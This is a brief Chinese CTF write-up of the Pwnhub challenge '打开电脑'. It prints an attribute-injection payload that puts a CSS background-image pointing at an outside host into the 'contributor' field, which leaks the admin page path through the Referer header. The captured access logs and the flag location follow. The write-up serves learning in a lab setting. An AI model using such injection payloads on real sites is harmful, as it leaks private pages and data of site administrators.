Pwnhub-打开电脑
本地未做,看大佬们的wp复现。论ctf字典有一个flag.php的重要性。
详情
http://52.80.1.108:6666
更新
- 2017.02.18 20:00:00没有SQL注入,仔细看CSP头。
- 2017.02.18 12:00:00管理员只爱看有意思的东西,谁关心bug啊哈哈哈哈。
打开出现:ERR_UNSAFE_PORT
经过搜索后,发现原来是浏览器的不安全端口
http://www.cnblogs.com/lyl6796910/p/4025712.html
解决办法:选中Google Chrome 快捷方式,右键属性,在”目标”对应文本框添加:
--explicitly-allowed-ports=87,6666,556,6667
Content-Security-Policy:
default-src *;
img-src * data: blob:;
frame-src 'self';
script-src 'self' cdn.bootcss.com 'unsafe-eval';
style-src 'self' cdn.bootcss.com 'unsafe-inline';
connect-src * wss:;
根据提示,有用的点只有:http://52.80.1.108:6666/contact.php
看首页的输出点
<a id="modal" class="detail" href="#detail" data-toggle="modal" contributor=aaangelwhu hexdata=672e65613167722e333170366572657265726572657265>fffffffffffe53cdbc640fffb934cfb8</a>
有可控点。
contributor=kkk style=background-image:url(http://115.29.36.83/1.jpg)&md5hash=fffffffffffe53cdbc640fffb934cfb8&hexdata=672e65613167722e333170366572657265726572657265&description=
获得访问记录
115.159.200.107 - - [21/Feb/2017:15:43:41 +0800] "GET /1.jpg HTTP/1.1" 200 490
115.159.200.107 - - [21/Feb/2017:15:43:41 +0800] "GET /1.jpg HTTP/1.1" 200 490 "http://52.80.1.108:6666/01db4711f5ad4ace8d8dd345c44b2540/admin.php" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
最后flag是
http://52.80.1.108:6666/01db4711f5ad4ace8d8dd345c44b2540/flag.php
know it then do it